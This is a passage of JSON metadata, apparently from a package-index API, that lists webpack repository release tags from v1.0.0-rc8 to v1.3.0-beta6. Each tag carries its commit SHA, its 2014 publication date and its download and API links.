/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6/manifests"},{"name":"v1.3.0-beta5","sha":"8bfb752c526ef612b2011c7bc266b7adb7a8fcb7","kind":"commit","published_at":"2014-06-05T17:54:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5/manifests"},{"name":"v1.3.0-beta4","sha":"56e7073abbfec4b920bf1dffb0924027072d0c4e","kind":"commit","published_at":"2014-06-05T07:31:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4/manifests"},{"name":"v1.3.0-beta3","sha":"5cfd4138d682139af7069342aa66e0495070db9b","kind":"commit","published_at":"2014-06-04T06:48:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3/manifests"},{"name":"v1.3.0-beta2","sha":"560762a932475e21e68577ba33f9482d738f1edc","kind":"commit","published_at":"2014-06-03T06:45:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2/manifests"},{"name":"v1.3.0-beta1","sha":"ebac371b7228a04fab834260208d157c5333df0f","kind":"commit","published_at":"2014-06-02T22:19:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1/manifests"},{"name":"v1.2.0-beta6","sha":"fc6d418e3d5bd0bc6356e82850173c33c52a567a","kind":"commit","published_at":"2014-05-27T09:54:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6/manifests"},{"name":"v1.2.0-beta5","sha":"2b6bfde9d5d634e47558c6f6b8589622a1fb6062","kind":"commit","published_at":"2014-05-26T21:54:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5/manifests"},{"name":"v1.2.0-beta4","sha":"4ead6596a9a96dcde6f827ce1dce77c36701f113","kind":"commit","published_at":"2014-05-26T10:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4/manifests"},{"name":"v1.2.0-beta3","sha":"36803b52719fa8f07d21c5fbab90f26a8b1f2bed","kind":"commit","published_at":"2014-05-22T10:17:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3/manifests"},{"name":"v1.2.0-beta2","sha":"8ddfa0a950520306bb8694071d168a0d2a7a18a2","kind":"commit","published_at":"2014-05-21T16:34:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2/manifests"},{"name":"v1.2.0-beta1","sha":"943a17c027279833e03a1b62fa60417cf4a5a5ac","kind":"commit","published_at":"2014-05-21T05:49:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1/manifests"},{"name":"v1.1.11","sha":"2898f870eaeefcf0b60885743df8da9362883d63","kind":"commit","published_at":"2014-05-16T23:00:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11/manifests"},{"name":"v1.1.10","sha":"7824ed8e29961197f3d74a755820f7b31fa01b5b","kind":"commit","published_at":"2014-05-08T16:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10/manifests"},{"name":"v1.1.9","sha":"613e6a0bd0b4ca24791d01b3131b98533e33ff3a","kind":"commit","published_at":"2014-05-08T07:35:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9/manifests"},{"name":"v1.1.8","sha":"adf3108a785630cd46daff093a80eb78f507a3a5","kind":"commit","published_at":"2014-04-19T19:36:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8/manifests"},{"name":"v1.1.7","sha":"0ed9c759926ac0f7ec9be10643522657c6b4af53","kind":"commit","published_at":"2014-04-17T07:56:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7/manifests"},{"name":"v1.1.6","sha":"504cb48e8fbd298fc6fa89f4fce99f30f8c072d1","kind":"commit","published_at":"2014-04-17T06:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6/manifests"},{"name":"v1.1.5","sha":"32df8b73092c4fb59965f14ff833dfe70ba4940e","kind":"commit","published_at":"2014-04-09T07:12:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5/manifests"},{"name":"v1.1.4","sha":"d6aa7b1388a3fe4b1a3b146a4986bb2b5ea99d03","kind":"commit","published_at":"2014-04-05T16:11:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4/manifests"},{"name":"v1.1.3","sha":"5dcf54c1d4885d50625d799625c14123fd412fe1","kind":"commit","published_at":"2014-04-03T17:47:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3/manifests"},{"name":"v1.1.2","sha":"fece5aee86748f0f230176aa25d9a7334e91be3d","kind":"commit","published_at":"2014-03-31T09:33:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2/manifests"},{"name":"v1.1.1","sha":"67cae9333cd53eb29efd32944961172313d9e49a","kind":"commit","published_at":"2014-03-31T06:50:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"5154409d669d871540b8052c1173244cdc1a1aa1","kind":"commit","published_at":"2014-03-25T09:31:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0/manifests"},{"name":"v1.1.0-beta12","sha":"256baf487179c7dee8254e716cd7f9d0db84842f","kind":"commit","published_at":"2014-03-21T15:22:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12/manifests"},{"name":"v1.1.0-beta11","sha":"8af61319cbe22cb17a406180d94faab54b39a7f6","kind":"commit","published_at":"2014-03-20T07:38:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11/manifests"},{"name":"v1.1.0-beta10","sha":"b1d5ed3dd6f84ee29070795d2b269a2a03a57c57","kind":"commit","published_at":"2014-03-19T21:16:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10/manifests"},{"name":"v1.1.0-beta9","sha":"410c1f5bf82e66b9faaa7dbe2d9b58538c86b0e7","kind":"commit","published_at":"2014-03-18T21:45:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9/manifests"},{"name":"v1.1.0-beta8","sha":"48ace947f915a9388b87119d43afb4e5580c2ed8","kind":"commit","published_at":"2014-03-12T22:03:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8/manifests"},{"name":"v1.1.0-beta7","sha":"06056a40bee6fc843d15b854f6b0c7bacc381ac6","kind":"commit","published_at":"2014-03-12T21:30:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7/manifests"},{"name":"v1.1.0-beta6","sha":"5ab7bf35ae2ad2ba1defe4cee4c5ab46679f1534","kind":"commit","published_at":"2014-03-11T17:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6/manifests"},{"name":"v1.1.0-beta5","sha":"00c11cb7c27dfb416e36cf21200bad0c86cea34c","kind":"commit","published_at":"2014-03-11T15:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5/manifests"},{"name":"v1.1.0-beta4","sha":"8ec37911f52b476f57e75480e642c7932dc43112","kind":"commit","published_at":"2014-03-10T13:00:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4/manifests"},{"name":"v1.1.0-beta3","sha":"4a47a7add67c38faec552ae0e06da7632758c022","kind":"commit","published_at":"2014-03-07T16:08:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3/manifests"},{"name":"v1.1.0-beta2","sha":"65ac850ab7b425a5c2264bd60a91fdf9b1e891ea","kind":"commit","published_at":"2014-03-05T19:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2/manifests"},{"name":"v1.1.0-beta1","sha":"b27540e27bc34809110b180a19a3e56537aeb8df","kind":"commit","published_at":"2014-03-03T14:21:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1/manifests"},{"name":"v1.0.5","sha":"09afa4749babcfc8dd4aa2866b385c27cf00ce59","kind":"commit","published_at":"2014-03-01T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5/manifests"},{"name":"v1.0.4","sha":"b88938ceea7f2017723f2baf21d604ce726b2c4a","kind":"commit","published_at":"2014-03-01T12:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4/manifests"},{"name":"v1.0.3","sha":"f172af367494f70acdb194adca1624df9bee05c5","kind":"commit","published_at":"2014-02-27T08:20:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3/manifests"},{"name":"v1.0.1","sha":"c5f3bdec73c8efcf0179fe966230c652e8111557","kind":"commit","published_at":"2014-02-24T14:07:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"5530e3784dbad2952ce210a7ad4fa5e87b7c14c2","kind":"commit","published_at":"2014-02-19T22:09:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc12","sha":"b1092b01f39e4de332dd63ce0deb51ad2af18bfc","kind":"commit","published_at":"2014-02-15T10:29:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12/manifests"},{"name":"v1.0.0-rc11","sha":"1640c651604417d6169a3cbd0d11ad8f592e2c70","kind":"commit","published_at":"2014-02-14T11:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11/manifests"},{"name":"v1.0.0-rc10","sha":"4f8ef991f1e7e5256fc061adbd8ba095c84c0d26","kind":"commit","published_at":"2014-02-14T09:07:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10/manifests"},{"name":"v1.0.0-rc9","sha":"820f304a9a77ae33bbe17d6eaac10595e5434543","kind":"commit","published_at":"2014-02-13T16:32:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9/manifests"},{"name":"v1.0.0-rc8","sha":"254c81c6afa7ac18030ab4bf3e37ab37ffbf1ea0","kind":"commit","published_at":"2014-02-13T10:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-